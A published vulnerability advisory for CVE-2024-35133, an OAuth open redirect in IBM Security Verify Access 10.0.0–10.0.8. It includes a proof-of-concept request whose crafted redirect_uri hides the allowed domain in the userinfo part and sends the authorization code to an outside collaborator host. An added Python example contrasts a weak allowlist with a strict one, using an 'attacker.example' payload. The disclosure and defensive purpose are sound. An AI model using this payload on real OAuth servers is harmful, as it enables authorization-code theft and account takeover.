IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

EDB-ID: 52123
Platform: Multiple
Date: 2025-04-05

- IBM Security Verify Access >= 10.0.0 <= 10.0.8 - Open Redirect during OAuth Flow

======== < Table of Contents > ================================================

  0. Overview
  1. Detailed Description
  2. Proof Of Concept
  3. Solution
  4. Disclosure Timeline
  5. References
  6. Credits
  7. Legal Notices

======== < 0. Overview > ======================================================

  Revision:
    1.0

  Impact:
    By persuading a victim to visit a specially crafted Web site, a remote 
    attacker could exploit this vulnerability to spoof the URL displayed 
    to redirect a user to a malicious Web site that would appear to be
    trusted. This could allow the attacker to obtain highly sensitive 
    information or conduct further attacks against the victim.

  Severity:
    NIST: High
    IBM: Medium

  CVSS Score:
    NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
    IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

  CVE-ID:
    CVE-2024-35133

  Vendor:
    IBM

  Affected Products:
    IBM Security Verify Access
    IBM Security Verify Access Docker

  Affected Versions:
    10.0.0 - 10.0.8

  Product Description:

    IBM Security Verify Access is a complete authorization and network
    security policy management solution. It provides end-to-end protection
    of resources over geographically dispersed intranets and extranets.

    In addition to state-of-the-art security policy management, IBM Security
    Verify Access provides authentication, authorization, data security, and
    centralized resource management capabilities.

    IBM Security Verify Access offers the following features:
    Authentication ~ Provides a wide range of built-in authenticators and
    supports external authenticators.

    Authorization ~ Provides permit and deny decisions for protected resources
    requests in the secure domain through the authorization API.

    Data security and centralized resource management ~ Manages secure access
    to private internal network-based resources by using the public Internet's
    broad connectivity and ease of use with a corporate firewall system.

======== < 1. Detailed Description > ==========================================

  During a penetration test of a client's OAuth flow, an Open Redirect
  vulnerability was found that can lead to the leakage of the OAuth
  authorization "code" parameter.

  It was possible to bypass the parser logic responsible for verifying the
  correctness and validity of the "redirect_uri" parameter during an OAuth
  flow by leveraging the userinfo component defined in RFC 3986 section 3.2.1,
  i.e. by supplying a username and password directly in the Uniform Resource
  Identifier (URI), in the form "https://user:password@host/path".

  By placing a legitimate, expected domain in the "username" position, it was
  possible to bypass the whitelist filter used by IBM Security Verify Access:
  the filter treated the URI as pointing to the allowed domain, whereas a
  browser connects to the real host, which is whatever follows the "@" sign.
  This causes an Open Redirect to an arbitrary attacker-controlled domain,
  not only altering the expected flow but also redirecting the user to a
  malicious Web site that would appear to be trusted.

  Because the authorization server appends the "code" parameter to the
  redirect target, the attacker-controlled host receives the authorization
  code in the Location header. This could allow the attacker to obtain highly
  sensitive information such as the OAuth "code" or to conduct further attacks
  against the victim.
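
  The following is an added example, not IBM's code and not part of the
  original advisory: it models a redirect_uri allowlist of the kind described
  above, shows why a URI carrying an RFC 3986 userinfo component slips past a
  scheme://host prefix check, and contrasts it with an exact-match validator.
  The registered redirect URI, the attacker host "attacker.example", the
  function names and the minimal authorize() model are all constructed for
  illustration; the actual parsing logic inside IBM Security Verify Access is
  not public, so the weak check is a hypothetical stand-in for that bug class.

```python
"""Added example (not IBM's code): a userinfo component in redirect_uri
defeats a prefix allowlist; an exact-match validator stops it.

All names, the registered redirect URI and the attacker host are constructed
for this illustration. "legitimate.domain" is the placeholder the advisory uses.
"""
from typing import Callable, Optional, Tuple
from urllib.parse import urlencode, urlsplit

# Constructed registration data: the client's single registered redirect URI.
REGISTERED_REDIRECT_URIS = frozenset({"https://legitimate.domain/callback"})

# Constructed attacker payload, shaped like the advisory's PoC: the allowed
# domain sits in the RFC 3986 userinfo ("user:password@") position and the
# real host (attacker.example, hypothetical) follows the "@".
CRAFTED_REDIRECT_URI = "https://legitimate.domain:bypass@attacker.example/callback"


def browser_target_host(uri: str) -> str:
    """Host a browser actually connects to: the authority after the last '@'."""
    return urlsplit(uri).hostname or ""


def userinfo(uri: str) -> Tuple[Optional[str], Optional[str]]:
    """(username, password) carried in the authority component, if any."""
    parts = urlsplit(uri)
    return parts.username, parts.password


def weak_allowlist_check(redirect_uri: str) -> bool:
    """Hypothetical weak filter: accepts any redirect_uri that starts with a
    registered scheme://host. The crafted URI starts with
    "https://legitimate.domain", so it passes although its host is
    attacker.example. This stands in for the bug class the advisory describes."""
    for allowed in REGISTERED_REDIRECT_URIS:
        a = urlsplit(allowed)
        if redirect_uri.startswith(f"{a.scheme}://{a.hostname}"):
            return True
    return False


def strict_redirect_uri_check(redirect_uri: str) -> bool:
    """Hardened validator: exact string comparison against the registered URIs
    (the OAuth 2.0 Security BCP requirement), plus defence-in-depth rejection of
    userinfo, fragments and non-https schemes in case registration data is
    ever loosened to patterns."""
    if redirect_uri not in REGISTERED_REDIRECT_URIS:
        return False
    parts = urlsplit(redirect_uri)
    if parts.username is not None or parts.password is not None:
        return False
    if parts.fragment or parts.scheme != "https":
        return False
    return True


def authorize(redirect_uri: str, state: str, code: str,
              check: Callable[[str], bool]) -> dict:
    """Minimal model of the /authorize decision: with an accepted redirect_uri,
    answer 302 with a Location carrying state and code (as the PoC response
    does); otherwise answer 400 and never redirect."""
    if not check(redirect_uri):
        return {"status": 400, "error": "invalid_request"}
    query = urlencode({"state": state, "code": code})
    return {"status": 302, "location": f"{redirect_uri}?{query}"}


if __name__ == "__main__":
    # Constructed state/code values; a real server generates both.
    weak = authorize(CRAFTED_REDIRECT_URI, "xyz", "SAMPLEcode", weak_allowlist_check)
    print("weak  :", weak["status"], "->", browser_target_host(weak.get("location", "")))
    strict = authorize(CRAFTED_REDIRECT_URI, "xyz", "SAMPLEcode", strict_redirect_uri_check)
    print("strict:", strict["status"], strict.get("error"))
```

  Run stand-alone, the weak path answers 302 to a Location whose host is the
  attacker's while the allowed name is only the username; the strict path
  answers 400 and the authorization code is never emitted. The exact-match
  rule is what closes the hole; the extra userinfo/fragment/scheme checks are
  belt-and-braces for deployments that register URI patterns instead.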

======== < 2. Proof of Concept > ==============================================

===== REQUEST =====

[[
  GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
  Host: [REDACTED]
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Te: trailers
  Connection: close
]]

===== RESPONSE =====

[[
  HTTP/1.1 302 Found 
  content-language: en-US 
  date: Tue, 19 Mar 2024 16:04:35 GMT 
  location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED] 
  p3p: CP="NON CUR OTPi OUR NOR UNI" 
  x-frame-options: DENY 
  x-content-type-options: nosniff 
  cache-control: no-store 
  x-xss-protection: 1; mode=block 
  x-permitted-cross-domain-policies: none 
  cross-origin-resource-policy: same-site 
  content-security-policy: frame-ancestors 'none' 
  referrer-policy: no-referrer-when-downgrade 
  strict-transport-security: max-age=31536000; includeSubDomains 
  pragma: no-cache 
  Content-Length: 0
]]

======== < 3. Solution > ======================================================

  Refer to IBM Security Bulletin 7166712 for patch, upgrade or
  suggested workaround information.

  See "References" for more details.

======== < 4. Disclosure Timeline > ===========================================

  19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
  21/03/2024 - Vulnerability shared with the client who commissioned the
               Penetration Test on its infrastructure, which relies on IBM SVA
  02/04/2024 - Vulnerability shared with IBM
  02/04/2024 - Vulnerability taken over by IBM
  14/05/2024 - Vulnerability confirmed by IBM
  18/07/2024 - Pre-release provided by IBM to the customer to verify the
               resolution of the vulnerability
  27/08/2024 - Security Bulletin and vulnerability published by IBM

======== < 5. References > ====================================================

  (1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
  (2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026
  (3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133
  (4) https://cwe.mitre.org/data/definitions/178.html
 
======== < 6. Credits > =======================================================

  This vulnerability was discovered and reported by:

    Giulio Garzia 'Ozozuz'

  Contacts:

    https://www.linkedin.com/in/giuliogarzia/
    https://github.com/Ozozuz

======== < 7. Legal Notices > ================================================

  Copyright (c) 2024 Giulio Garzia "Ozozuz"

  Permission is granted for the redistribution of this alert
  electronically. It may not be edited in any way without my express
  written consent. If you wish to reprint the whole or any
  part of this alert in any medium other than electronically,
  please email me for permission.

  Disclaimer: The information in the advisory is believed to be accurate
  at the time of publishing based on currently available information.
  Use of the information constitutes acceptance for use in an AS IS
  condition.
  There are no warranties with regard to this information. Neither the
  author nor the publisher accepts any liability for any direct,
  indirect, or consequential loss or damage arising from use of,
  or reliance on, this information.